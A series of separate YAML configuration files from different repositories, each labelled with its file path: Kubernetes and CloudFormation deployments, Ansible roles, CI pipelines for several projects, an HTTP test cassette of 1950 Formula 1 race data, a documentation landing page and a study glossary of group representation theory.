name: arcus-config
- name: OPS_BOOTSTRAP_SERVERS
valueFrom:
configMapKeyRef:
key: OPS_BOOTSTRAP_SERVERS
name: arcus-config
- name: KAIROS_URL
value: http://kairosdb-service.default.svc.cluster.local:8080
- name: rollup_defaultTTL
value: '3600'
- name: rollup_mediumTTL
value: '7200'
- name: rollup_highTTL
value: '86400'
image: gcr.io/arcus-238802/arcus/metrics-server:2019.10.0
imagePullPolicy: Always
name: metrics-server
resources:
limits:
cpu: "1"
requests:
cpu: "0.05"
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
|
config/deployments/metrics-server.yml
|
- name: <docker/registry>
debug:
msg: Print tag <docker/registry> for KubeKit Configurator parser
- name: Check all hosts are still available
include_role:
name: precheck
tasks_from: all_hosts_alive
- set_fact:
docker_registry_host_list_item:
- "{{ hostvars[item]['ansible_host']|default('localhost') }}"
- "{{ hostvars[item]['public_ip']|default('127.0.0.1') }}"
- "{{ hostvars[item]['private_ip']|default('127.0.0.1') }}"
- "{{ hostvars[item]['private_dns']|default('localhost') }}"
- "{{ hostvars[item]['public_dns']|default('localhost') }}"
with_items: "{{ groups.master }}"
register: docker_registry_host_list_result
- set_fact:
docker_registry_host_list: "{{ docker_registry_host_list_result.results | map(attribute='ansible_facts.docker_registry_host_list_item') | list }}"
- include_tasks: certs.yml
vars:
docker_registry_host: "{{ item.0 }}:{{ item.1 }}"
with_nested:
- "{{ [ 'localhost', docker_registry_host_list ] | flatten | unique }}"
- ["{{ registry_port }}", "{{ alternative_registry_port }}"]
- include_tasks: certs.yml
vars:
docker_registry_host: "{{ kube_virtual_ip_api }}:{{ item }}"
with_items:
- "{{ registry_port }}"
- "{{ registry_lb_port }}"
- "{{ alternative_registry_port }}"
when:
- is_ha_cluster
- kube_virtual_ip_api is defined
- kube_virtual_ip_api != ''
- block:
- include_tasks: manifest_preload.yml
- include_tasks: registry_image.yml
- name: assert {{ docker_registry_path }} exists
file:
path: "{{ docker_registry_path }}"
state: directory
mode: 0700
- name: render template to /usr/lib/systemd/system/registry.service
template:
src: usr/lib/systemd/system/registry.service.j2
dest: /usr/lib/systemd/system/registry.service
mode: 0644
register: registry_unit
notify: reload and restart registry
- name: ensure '{{ cert_dir }}' exists
file:
path: "/etc/systemd/system/{{ item }}.service.d/"
state: directory
owner: root
group: root
mode: 0755
with_items:
- "docker"
- "registry"
- name: add docker systemd unit override
template:
src: etc/systemd/system/docker.service.d/docker.conf.j2
dest: /etc/systemd/system/docker.service.d/docker.conf
mode: 0644
notify: reload and restart docker
- name: add registry systemd unit override
copy:
src: etc/systemd/system/registry.service.d/registry.conf
dest: /etc/systemd/system/registry.service.d/registry.conf
mode: 0644
notify: reload and restart registry
- meta: flush_handlers
when: registry_unit.changed
- name: enforce registry running
systemd:
name: registry
state: restarted # need to find a better way to handle cert changes
enabled: yes
- name: Wait up to 2 minutes for docker to stabilize
wait_for:
port: "{{ registry_port }}"
delay: 10
timeout: 120
- name: Check for existing local images
uri:
url: https://localhost:5000/v2/_catalog
return_content: yes
validate_certs: no
client_cert: "{{ cert_dir }}/{{ cert_crt_filename }}"
client_key: "{{ cert_dir }}/{{ cert_key_filename }}"
register: repo
retries: 2
delay: 10
# repo loading could be done in one step with the ansible docker image
# module, but the module depends on pydocker on the remote nodes
- block:
- set_fact:
images_to_registry: "{{ images_to_registry|default([]) + item.value.values() }}"
with_items: "{{ current_manifest.dependencies | dict2items }}"
- include_tasks: images.yml
loop: "{{ images_to_registry }}"
loop_control:
label: "{{ image['name'] }}"
loop_var: image
tags:
- load_images_to_registry
when: "'master' in group_names"
- name: </docker/registry>
debug:
msg: Print tag </docker/registry> for KubeKit Configurator parser
|
pkg/configurator/templates/ansible/roles/docker/registry/tasks/main.yml
|
# 1.
Fundamentals:
group representation: ''
homomorphism of representations: ''
left(/right)-regular representation: ''
adjoint representation: ''
group algebra: ''
G-linear projection: ''
subrepresentation: ''
quotient representation: ''
irreducible representation: ''
first isomorphism theorem of representations: ''
# 2.
Maschke's and Schur's:
decomposable: ''
semisimple: ''
Maschke's theorem: ''
representations of cyclic groups: ''
Schur's lemma: ''
uniqueness of decomposition: ''
representations of Abelian groups: ''
1-dimensional representations from Abelianisation: ''
# 3.
Decomposition of representations:
sum of squares formula: ''
G-invariant subspace: ''
averaging map: ''
number of irreducible subrepresentation equal the number of conjugacy classes: ''
# 4.
Tensor product and dual representation:
free vector space: ''
tensor product of vector spaces: ''
universal property of the tensor product: ''
basis of the tensor product: ''
tensor product of representations: ''
dual representation: ''
Kronecker product: ''
external tensor product of representations: ''
irreducibility of the external tensor product of representations: ''
# 5.
Character theory:
character: ''
class function: ''
inner product on class functions: ''
characters of irreducible representation are orthonormal: ''
two representations are isomorphic iff they have the same character: ''
character table: ''
every normal subgroup is an intersection of kernels of irreducible representations: ''
commutator subgroup is the intersection of the kernels of 1-dimensional representations: ''
# 6.
Algebra and modules:
ℂ-algebra: ''
left-module: ''
submodule: ''
simple: ''
semisimple module: ''
decomposable: ''
quotient module: ''
homomorphism of modules: ''
first isomorphism theorem for modules: ''
Schur's lemma for modules: ''
direct sum of modules: ''
finite dimensional left-module isomorphic to matrix algebra: ''
semisimple algebra: ''
Artin-Wedderburn theorem: ''
characters of modules: ''
Hoschild traces: ''
two modules over a finite-dimensional semisimple algebra are isomorphic iff they have the same character: ''
characters of simple left-modules of a finite-dimensional algebra form a basis in the space of Hoschild traces: ''
|
Y3/group-representation.yaml
|
pool:
vmImage: 'windows-latest'
# Build Variables
variables:
DOTNET_SKIP_FIRST_TIME_EXPERIENCE: 1
Prerelease: 'ci'
BuildConfiguration: 'Release'
# CI Trigger on master branch
trigger:
batch: false
branches:
include:
- master
paths:
exclude:
- docs/*
- '**/*.md'
# Trigger builds for PR's targeting master
pr:
branches:
include:
- master
paths:
exclude:
- docs/*
- '**/*.md'
steps:
- task: UseDotNet@2
displayName: 'Install .NET 5.0.x'
inputs:
packageType: 'sdk'
version: '5.0.x'
includePreviewVersions: true
- task: UseDotNet@2
displayName: 'Install .NET 3.0.x'
inputs:
packageType: 'sdk'
version: '3.0.x'
- task: SonarCloudPrepare@1
displayName: 'SonarQube Preparation'
inputs:
SonarCloud: 'SonarCloud'
organization: 'barclayadam'
scannerMode: 'MSBuild'
projectKey: barclayadam_blueprint
projectName: Blueprint
- task: DotNetCoreCLI@2
displayName: 'dotnet restore'
inputs:
command: 'restore'
- task: DotNetCoreCLI@2
displayName: 'dotnet build'
inputs:
command: 'build'
arguments: '--configuration $(BuildConfiguration) -p:Prerelease=$(Prerelease) --no-restore'
- task: DotNetCoreCLI@2
displayName: 'dotnet test'
inputs:
command: 'test'
arguments: '--configuration $(BuildConfiguration) -p:Prerelease=$(Prerelease) --no-build --no-restore --collect "Code coverage"'
- task: DotNetCoreCLI@2
displayName: 'dotnet pack'
inputs:
command: 'pack'
outputDir: '$(Build.ArtifactStagingDirectory)/.nupkgs'
verbosityPack: 'minimal'
nobuild: true
condition: and(succeeded(), ne(variables['Build.Reason'], 'PullRequest'))
- task: DotNetCoreCLI@2
displayName: 'dotnet push'
inputs:
command: 'push'
packagesToPush: '$(Build.ArtifactStagingDirectory)/.nupkgs/*.nupkg'
nuGetFeedType: 'internal'
publishVstsFeed: '91817c8d-b32d-4cea-8df3-57127121c593/1252a847-6abc-49a4-80ad-001f8ee7fd4c'
allowPackageConflicts: true
condition: and(succeeded(), ne(variables['Build.Reason'], 'PullRequest'))
- task: SonarCloudAnalyze@1
displayName: 'SonarCloud analysis'
- task: SonarCloudPublish@1
displayName: 'Publish SonarCloud results'
inputs:
pollingTimeoutSec: '300'
|
azure-pipelines.yml
|
variables:
ARTIFACT_NAME: cars-api-v$CI_PIPELINE_IID.jar
# $CI_PIPELINE_IID for version control (unique id)
APP_NAME: cars-api
stages:
- build
- test
- deploy
- post deploy
- publishing
build:
stage: build
image: openjdk:12-alpine
script:
- sed -i "s/CI_PIPELINE_IID/$CI_PIPELINE_IID/" ./src/main/resources/application.yml
- sed -i "s/CI_COMMIT_SHORT_SHA/$CI_COMMIT_SHORT_SHA/" ./src/main/resources/application.yml
- sed -i "s/CI_COMMIT_BRANCH/$CI_COMMIT_BRANCH/" ./src/main/resources/application.yml
# changing application information with gitlab ci/cd
- ./gradlew build
- mv ./build/libs/cars-api.jar ./build/libs/$ARTIFACT_NAME
# move the file (with new version name)
artifacts:
paths:
- ./build/libs/
smoke test:
stage: test
image: openjdk:12-alpine
before_script:
- apk --no-cache add curl
# Installing curl
script:
- java -jar ./build/libs/$ARTIFACT_NAME &
# build jar file
- sleep 30
- curl http://localhost:5000/actuator/health | grep "UP"
# search for specific string | create an input for next command
code quality:
stage: test
image: openjdk:12-alpine
script:
- ./gradlew pmdMain pmdTest
# static test for codes in Main and Test
artifacts:
when: always
# even if job fails we want to see the reports
paths:
- build/reports/pmd
# reports saved as artifacts
unit tests:
stage: test
image: openjdk:12-alpine
script:
- ./gradlew test
# executes test command
artifacts:
when: always
# even if job fails we want to see the reports
paths:
- build/reports/tests
# reports saved as artifacts
reports:
junit: build/test-results/test/*.xml
# all reports saved as xml file
deploy:
stage: deploy
image:
name: banst/awscli
# that is an image that includes AWS cli
entrypoint: [""]
# override entry point - no entry point
before_script:
- apk --no-cache add curl
# install curl
- apk --no-cache add jq
# parser of JSON file
script:
- aws configure set region us-east-2
# defining aws region
- aws s3 cp ./build/libs/$ARTIFACT_NAME s3://$S3_BUCKET/$ARTIFACT_NAME
# copying jar file from folder to S3 bucket, $S3_BUCKET is defined as environment variable in Gitlab
- aws elasticbeanstalk create-application-version --application-name $APP_NAME --version-label $CI_PIPELINE_IID --source-bundle S3Bucket=$S3_BUCKET,S3Key=$ARTIFACT_NAME
# create application version (NOT ACTIVE) $APP_NAME = cars-api and specify the jar file location in S3
- CNAME=$(aws elasticbeanstalk update-environment --application-name $APP_NAME --environment-name "Carsapi-env" --version-label=$CI_PIPELINE_IID | jq '.CNAME' --raw-output)
# for activating version and getting domain name and assign in CNAME
- sleep 50
- curl http://$CNAME/actuator/info | grep $CI_PIPELINE_IID
# checking version
- curl http://$CNAME/actuator/health | grep "UP"
# checking health of application
api testing:
stage: post deploy
image:
name: vdespa/newman
entrypoint: [""]
script:
- newman --version
- newman run "Cars API.postman_collection.json" --environment production.postman_environment.json --reporters cli,htmlextra,junit --reporter-htmlextra-export "newman/report.html" --reporter-junit-export "newman/report.xml"
artifacts:
when: always
paths:
- newman/
reports:
junit: newman/report.xml
pages:
stage: publishing
script:
- mkdir public
- mv newman/report.html public/index.html
artifacts:
paths:
- public
|
.gitlab-ci.yml
|
---
http_interactions:
- request:
method: get
uri: http://ergast.com/api/f1/1950.json
body:
encoding: US-ASCII
string: ''
headers:
Accept-Encoding:
- gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept:
- "*/*"
User-Agent:
- Ruby
Host:
- ergast.com
response:
status:
code: 200
message: OK
headers:
Date:
- Sat, 22 Jul 2017 14:23:12 GMT
Server:
- Apache/2.2.15 (CentOS)
X-Powered-By:
- PHP/5.3.3
Access-Control-Allow-Origin:
- "*"
Content-Length:
- '2754'
Content-Type:
- application/json; charset=utf-8
X-Cache:
- MISS from cache_server
X-Cache-Lookup:
- MISS from cache_server:3128
Via:
- 1.0 cache_server:3128 (squid/2.6.STABLE21)
Connection:
- close
body:
encoding: UTF-8
string: '{"MRData":{"xmlns":"http:\/\/ergast.com\/mrd\/1.4","series":"f1","url":"http://ergast.com/api/f1/1950.json","limit":"30","offset":"0","total":"7","RaceTable":{"season":"1950","Races":[{"season":"1950","round":"1","url":"http:\/\/en.wikipedia.org\/wiki\/1950_British_Grand_Prix","raceName":"British
Grand Prix","Circuit":{"circuitId":"silverstone","url":"http:\/\/en.wikipedia.org\/wiki\/Silverstone_Circuit","circuitName":"Silverstone
Circuit","Location":{"lat":"52.0786","long":"-1.01694","locality":"Silverstone","country":"UK"}},"date":"1950-05-13"},{"season":"1950","round":"2","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Monaco_Grand_Prix","raceName":"Monaco
Grand Prix","Circuit":{"circuitId":"monaco","url":"http:\/\/en.wikipedia.org\/wiki\/Circuit_de_Monaco","circuitName":"Circuit
de Monaco","Location":{"lat":"43.7347","long":"7.42056","locality":"Monte-Carlo","country":"Monaco"}},"date":"1950-05-21"},{"season":"1950","round":"3","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Indianapolis_500","raceName":"Indianapolis
500","Circuit":{"circuitId":"indianapolis","url":"http:\/\/en.wikipedia.org\/wiki\/Indianapolis_Motor_Speedway","circuitName":"Indianapolis
Motor Speedway","Location":{"lat":"39.795","long":"-86.2347","locality":"Indianapolis","country":"USA"}},"date":"1950-05-30"},{"season":"1950","round":"4","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Swiss_Grand_Prix","raceName":"Swiss
Grand Prix","Circuit":{"circuitId":"bremgarten","url":"http:\/\/en.wikipedia.org\/wiki\/Circuit_Bremgarten","circuitName":"Circuit
Bremgarten","Location":{"lat":"46.9589","long":"7.40194","locality":"Bern","country":"Switzerland"}},"date":"1950-06-04"},{"season":"1950","round":"5","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Belgian_Grand_Prix","raceName":"Belgian
Grand Prix","Circuit":{"circuitId":"spa","url":"http:\/\/en.wikipedia.org\/wiki\/Circuit_de_Spa-Francorchamps","circuitName":"Circuit
de Spa-Francorchamps","Location":{"lat":"50.4372","long":"5.97139","locality":"Spa","country":"Belgium"}},"date":"1950-06-18"},{"season":"1950","round":"6","url":"http:\/\/en.wikipedia.org\/wiki\/1950_French_Grand_Prix","raceName":"French
Grand Prix","Circuit":{"circuitId":"reims","url":"http:\/\/en.wikipedia.org\/wiki\/Reims-Gueux","circuitName":"Reims-Gueux","Location":{"lat":"49.2542","long":"3.93083","locality":"Reims","country":"France"}},"date":"1950-07-02"},{"season":"1950","round":"7","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Italian_Grand_Prix","raceName":"Italian
Grand Prix","Circuit":{"circuitId":"monza","url":"http:\/\/en.wikipedia.org\/wiki\/Autodromo_Nazionale_Monza","circuitName":"Autodromo
Nazionale di Monza","Location":{"lat":"45.6156","long":"9.28111","locality":"Monza","country":"Italy"}},"date":"1950-09-03"}]}}}'
http_version:
recorded_at: Sat, 22 Jul 2017 13:30:56 GMT
recorded_with: VCR 3.0.3
|
vcr_cassettes/season_cassette.yml
|
AWSTemplateFormatVersion: 2010-09-09
Parameters:
StageName:
Type: String
Description: Represents a unique identifier for a version of a deployed RestApi that is callable by users.
Resources:
LambdaFunction:
Type: AWS::Lambda::Function
Properties:
Code:
S3Bucket: <BUCKET_NAME>
S3Key: <BUCKET_KEY>
Description: Sample Lambda
FunctionName: SampleLambda
Handler: main
MemorySize: 128
Role: !GetAtt LambdaFunctionRole.Arn
Runtime: go1.x
Timeout: 10
LambdaFunctionRole:
Type: AWS::IAM::Role
Properties:
RoleName: SampleLambdaRole
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Action: sts:AssumeRole
Principal:
Service:
- lambda.amazonaws.com
Path: '/'
ManagedPolicyArns:
# This gives your Lambda permission to use AWS X-Ray
- arn:aws:iam::aws:policy/AWSXrayWriteOnlyAccess
# Uncomment this if the Lambda is in a VPC
# - arn:aws:iam::aws:policy/service-role/AWSLambdaVPCAccessExecutionRole
ApiGateway:
Type: AWS::ApiGateway::RestApi
Properties:
Name: SampleAPIGateway
Description: Sample API Gateway
EndpointConfiguration:
Types:
# For a regional API and its custom domain name.
- REGIONAL
# For a private API.
# - PRIVATE
# For an edge-optimized API and its custom domain name.
# - EDGE
Body:
Fn::Transform:
Name: AWS::Include
Parameters:
Location: !Sub s3://path/to/swagger.yaml
ApiGatewayAccount:
Type: AWS::ApiGateway::Account
Properties:
CloudWatchRoleArn: !GetAtt ApiGatewayRole.Arn
ApiGatewayRole:
Type: AWS::IAM::Role
Properties:
RoleName: SampleApiGatewayCloudWatchRole
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Action: sts:AssumeRole
Principal:
Service:
- apigateway.amazonaws.<EMAIL>
Path: '/'
ManagedPolicyArns:
- 'arn:aws:iam::aws:policy/service-role/AmazonAPIGatewayPushToCloudWatchLogs'
ApiGatewayStage:
Type: AWS::ApiGateway::Stage
DependsOn:
- ApiAccount
Properties:
DeploymentId: !Ref ApiGatewayDeployment
MethodSettings:
- DataTraceEnabled: true
HttpMethod: '*'
LoggingLevel: INFO
ResourcePath: /*
RestApiId: !Ref ApiGateway
StageName: !Ref StageName
ApiGatewayDeployment:
Type: AWS::ApiGateway::Deployment
Properties:
RestApiId: !Ref ApiGateway
|
template.yaml
|
# Enable submodules
variables:
GIT_STRATEGY: clone
GIT_SUBMODULE_STRATEGY: recursive
linux-tool:
stage: build-and-test
script:
- make riscos-build-online
- make test
artifacts:
when: always
paths:
- riscos-build-online
tags:
- linux
linux-deb:
stage: package
script:
- make deb
artifacts:
when: always
paths:
- riscos-build-online_*.deb
tags:
- linux
riscos-tool:
stage: build-and-test
script:
# FIXME: With a bit of thought I could replace the curl running of the build with
# an invocation of the tool that we just built.
- |
set -o pipefail
mkdir /tmp/robuild
# Zip up the source to send to robuild
zip -q9r /tmp/source-archive.zip * .robuild.yaml
# Send the archive file to JFPatch as a service
curl -q -F 'source=@/tmp/source-archive.zip' -o /tmp/robuild/result.json https://json.build.riscos.online/build/json
# Extract any system messages and output
jq -r '.messages[]' /tmp/robuild/result.json > /tmp/robuild/messages.txt || { echo "Server response:" ; cat /tmp/robuild/result.json ; false ; }
jq -r 'reduce .output[] as $i ("";. + $i)' /tmp/robuild/result.json > /tmp/robuild/output.txt
# Extract return code
rc=$(jq -r .rc /tmp/robuild/result.json | tee /tmp/robuild/rc.json)
# Marker files for the state
if [ "$rc" != "0" ] ; then touch /tmp/robuild/failed ; else touch /tmp/robuild/ok ; fi
# Extract the built binary if we had any
if [ "$rc" = "0" ] ; then
jq -r .data /tmp/robuild/result.json | base64 --decode - > /tmp/robuild/built
fi
# Outputs:
# /tmp/robuild/result.json - JSON output from the service.
# /tmp/robuild/{ok,failed} - status of the build (whether RC was 0).
# /tmp/robuild/built - the output result from the build.
# /tmp/robuild/rc - the value of the return code (decimal string)
# /tmp/robuild/messages.txt - system messages
# /tmp/robuild/output.txt - output from the build
- |
echo "System messages:"
sed 's/^/ /' < /tmp/robuild/messages.txt
echo
echo "Build output:"
sed 's/^/ /' < /tmp/robuild/output.txt
echo
if [ ! -f /tmp/robuild/ok ] ; then
echo "FAILED! Aborting"
exit 1
fi
- |
if [[ -f VersionNum ]] ; then
version=$(sed '/MajorVersion / ! d ; s/.*MajorVersion *"\(.*\)"/\1/' VersionNum)
else
version=$(git rev-parse --short HEAD)
fi
echo This is version: $version
mkdir robuild-client-$version
if [ -f /tmp/robuild/built ] ; then
cp /tmp/robuild/built robuild-client-$version/riscos-build-online,ff8
else
echo "No archive was built?"
exit 1
fi
artifacts:
when: always
paths:
- robuild-client-*/riscos-build-online,ff8
tags:
- linux
stages:
- build-and-test
- package
|
.gitlab-ci.yml
|
name: "Build MySQL"
on:
# pull_request:
push:
branches:
- "releases/*"
workflow_dispatch:
inputs:
mysql-versions:
description: MySQL versions to build (JSON Array)
required: false
default: ""
jobs:
list:
runs-on: ubuntu-latest
timeout-minutes: 5
steps:
- uses: actions/checkout@v2
- id: set-matrix
name: list available MySQL versions
run: |
if [ -n "$MYSQL_VERSIONS" ]; then
echo "::set-output name=matrix::$(printenv MYSQL_VERSIONS | jq -c '{mysql: .}')"
else
echo "::set-output name=matrix::$(< versions/mysql.json jq -c '{mysql: .}')"
fi
env:
MYSQL_VERSIONS: ${{ github.event.inputs.mysql-versions }}
outputs:
matrix: ${{ steps.set-matrix.outputs.matrix }}
build-linux:
runs-on: ubuntu-18.04
needs: list
strategy:
fail-fast: false
matrix: ${{fromJson(needs.list.outputs.matrix)}}
env:
MYSQL_VERSION: ${{ matrix.mysql }}
timeout-minutes: 180
steps:
- name: install gcc
run: |
sudo apt-get install gcc-8 g++-8
- uses: actions/checkout@v2
- run: .github/build-mysql-linux.sh "$MYSQL_VERSION"
- uses: actions/upload-artifact@v2
with:
name: mysql-${{ matrix.mysql }}-linux-x64.tar.xz
path: ${{ runner.temp }}/mysql.tar.xz
build-darwin:
runs-on: macos-10.15
needs: list
strategy:
fail-fast: false
matrix: ${{fromJson(needs.list.outputs.matrix)}}
env:
MYSQL_VERSION: ${{ matrix.mysql }}
timeout-minutes: 180
steps:
- uses: actions/checkout@v2
- run: .github/build-mysql-darwin.sh "$MYSQL_VERSION"
- uses: actions/upload-artifact@v2
with:
name: mysql-${{ matrix.mysql }}-darwin-x64.tar.xz
path: ${{ runner.temp }}/mysql.tar.xz
build-windows:
runs-on: windows-2019
needs: list
strategy:
fail-fast: false
matrix: ${{fromJson(needs.list.outputs.matrix)}}
env:
MYSQL_VERSION: ${{ matrix.mysql }}
timeout-minutes: 180
steps:
- uses: actions/checkout@v2
- run: .github\build-mysql-windows.ps1 $env:MYSQL_VERSION
- uses: actions/upload-artifact@v2
with:
name: mysql-${{ matrix.mysql }}-win32-x64.zip
path: "C:\\Temp\\mysql.zip"
upload:
needs:
- build-linux
- build-darwin
- build-windows
if: always()
runs-on: ubuntu-latest
timeout-minutes: 5
steps:
- uses: actions/checkout@v2
- uses: actions/download-artifact@v2
with:
path: artifacts
- name: upload to azure
run: |
"$GITHUB_WORKSPACE/.github/upload-to-azure.sh"
env:
AZCOPY_SPA_APPLICATION_ID: ${{ secrets.AZCOPY_SPA_APPLICATION_ID }}
AZCOPY_SPA_CLIENT_SECRET: ${{ secrets.AZCOPY_SPA_CLIENT_SECRET }}
AZCOPY_TENANT_ID: ${{ secrets.AZCOPY_TENANT_ID }}
working-directory: artifacts
|
.github/workflows/build-mysql.yml
|
version: 2
jobs:
build:
working_directory: ~/tmp
docker:
- image: adharaprojects/basic-docker-base:0.0.0
steps:
- checkout
- setup_remote_docker
- run:
name: Create virtual network for test
command: |
docker network create cyclos-cbs-proxy-client-test
- run:
name: Start CyclosDB
command: |
docker run --name cyclos-db-cbs-proxy-client-test --network=cyclos-cbs-proxy-client-test \
-e POSTGRES_DB=cyclos \
-e POSTGRES_USER=cyclos \
-e POSTGRES_PASSWORD=<PASSWORD> \
-d adharaprojects/cyclos:cash_tokenizer_1
- run:
name: Start Cyclos
command: |
docker run --name cyclos-cbs-proxy-client-test --network=cyclos-cbs-proxy-client-test \
-e DB_HOST=cyclos-db-cbs-proxy-client-test \
-e DB_NAME=cyclos \
-e DB_USER=cyclos \
-e DB_PASSWORD=<PASSWORD> \
-p "4001:8080" \
-d cyclos/cyclos:4.10.4
- run:
name: Build the CBS-proxy docker image and run the test
command: |
docker run --name cbs-proxy-for-client-test \
--network=host \
-e API_SERVER_PORT=3033 \
-e CBS_SERVER_ADDRESS=http://localhost:4001 \
-d adharaprojects/cbs-proxy:e85ed1
- run:
name: Wait for cyclos to be ready
command: |
sleep 20
- run:
name: Test cyclos network
command: |
docker run --name test-env-for-proxy-client --network=host -dt adharaprojects/node-test-env:0.0.0
docker cp . test-env-for-proxy-client:/app
docker exec test-env-for-proxy-client npm install
docker exec \
-e CBS_PROXY_URL=http://localhost:3033 \
-e CBS_SERVER_ADDRESS=http://localhost:4001 \
test-env-for-proxy-client npm test
- run:
name: Cleanup remote docker
command: |
docker stop cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client
docker rm cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client
docker network rm cyclos-cbs-proxy-client-test
# docker stop cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client; docker rm cyclos-cbs-proxy-client-test cyclos-db-cbs-proxy-client-test cbs-proxy-for-client-test test-env-for-proxy-client; docker network rm cyclos-cbs-proxy-client-test
|
.circleci/config.yml
|
title: Azure SQL tek veritabanları, sunucu veritabanları ve elastik havuzlar hakkındaki belgeleri bulma
summary: Azure SQL Veritabanı tek veritabanları, elastik havuzları ve veritabanı sunucularına yönelik kavramlar, hızlı başlangıç, öğretici ve örneklere ulaşın.
metadata:
title: Belgeler
description: Microsoft SQL Server’ın en son kararlı sürümünü temel alan ve hizmet olarak ilişkisel veritabanı (DBaaS) ürünü olan Azure SQL Veritabanı belgelerine ulaşın.
services: sql-database
ms.service: sql-database
ms.subservice: single-database
ms.topic: landing-page
author: stevestein
ms.author: sstein
ms.reviewer: carlrab
ms.date: 03/30/2020
ms.openlocfilehash: 1aa091dadce4f45db93e97640f5705524d72879e
ms.sourcegitcommit: 7581df526837b1484de136cf6ae1560c21bf7e73
ms.translationtype: HT
ms.contentlocale: tr-TR
ms.lasthandoff: 03/31/2020
ms.locfileid: "80421237"
landingContent:
- title: Tek Veritabanı
linkLists:
- linkListType: concept
links:
- text: SQL Database nedir?
url: sql-database-technical-overview.md
- text: Hangi SQL Veritabanı seçeneğini belirlemeliyim?
url: sql-database-paas-vs-sql-server-iaas.md
- text: Satın alma seçenekleri
url: sql-database-purchase-models.md
- text: Hizmet katmanları
url: sql-database-service-tiers-general-purpose-business-critical.md
- title: Esnek havuzlar
linkLists:
- linkListType: concept
links:
- text: Esnek havuzlar
url: sql-database-elastic-pool.md
- text: Esnek havuzları yönetme
url: sql-database-elastic-pool-manage.md
- text: Elastik havuzları ölçeklendirme
url: sql-database-elastic-pool-scale.md
- title: SQL Veritabanı sunucusu
linkLists:
- linkListType: concept
links:
- text: SQL Veritabanı sunucuları
url: sql-database-servers.md
- text: Bağlantı ayarları
url: sql-database-connectivity-settings.md
- text: Güvenlik duvarı kuralları
url: sql-database-server-level-firewall-rule.md
- title: Gelişmiş güvenlik
linkLists:
- linkListType: concept
links:
- text: Güvenlik özellikleri
url: sql-database-security-overview.md
- text: En iyi güvenlik uygulamaları
url: sql-database-security-best-practice.md
- text: Oturum açmalar, kullanıcı hesapları, roller ve izinler
url: sql-database-manage-logins.md
- text: Azure Active Directory
url: sql-database-aad-authentication.md
- title: Ölçeklenebilirlik
linkLists:
- linkListType: how-to-guide
links:
- text: Dinamik olarak ölçeği artırma veya azaltma
url: sql-database-scale-resources.md
- text: Okuma Amaçlı Ölçeği Genişletme
url: sql-database-read-scale-out.md
- text: Çapraz veritabanı işleri
url: sql-database-elastic-jobs-overview.md
- title: Fiyatlar ve hizmet katmanları
linkLists:
- linkListType: overview
links:
- text: Satın alma modelleri
url: sql-database-purchase-models.md
- text: Hizmet katmanları
url: sql-database-service-tiers-general-purpose-business-critical.md
- text: Sunucusuz
url: sql-database-serverless.md
- text: Hiper Ölçek
url: sql-database-service-tier-hyperscale.md
|
articles/sql-database/sql-database-single-index.yml
|
---
data:
-
organization: MITRE
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: Microsoft
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: Bosch
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: IBM
contributors:
- <NAME>
-
organization: NVIDIA
contributors:
- <NAME>.
- <NAME>
- <NAME>
- <NAME>
-
organization: Airbus
contributors:
- <NAME>
-
organization: PricewaterhouseCoopers
contributors:
- <NAME>
-
organization: Deep Instinct
contributors:
- <NAME>
- <NAME>
- <NAME>
-
organization: Two Six Labs
contributors:
- <NAME>
-
organization: University of Toronto
contributors:
- <NAME>
- <NAME>
- <NAME>
-
organization: Cardiff University
contributors:
- <NAME>
-
organization: Software Engineering Institute/Carnegie Mellon University
contributors:
- <NAME>
-
organization: Berryville Institute of Machine Learning
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
-
organization: Citadel AI
contributors:
- <NAME>
-
organization: McAfee
contributors:
- <NAME>
-
organization: Unaffiliated
contributors:
- <NAME>
-
organization: Ant Group
contributors:
- <NAME>
-
organization: Palo Alto Networks
contributors:
- <NAME>
- <NAME>
- <NAME>
- <NAME>
- <NAME>
|
content/contributorslist.yaml
|
---
- hosts: all
connection: local
vars_files:
- packages.yml
roles:
- role: geerlingguy.homebrew
homebrew_upgrade_all_packages: yes
homebrew_cask_accept_external_apps: true
tags: ['tools']
ignore_errors: yes
tasks:
- name: Install global Composer packages.
composer:
command: "{{ (item.state | default('present') == 'absent') | ternary('remove', 'require') }}"
arguments: "{{ item.name | default(item) }} {{ item.version | default('@stable') }}"
# Ansible 2.4 supports `global_command` making `working_dir` optional.
working_dir: "{{ lookup('env', 'COMPOSER_HOME') | default('~/.composer', true) }}"
with_items: "{{ composer_packages }}"
- name: Install global NPM packages.
npm:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
global: yes
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ npm_packages }}"
- name: Install global Ruby gems.
gem:
name: "{{ item.name | default(item) }}"
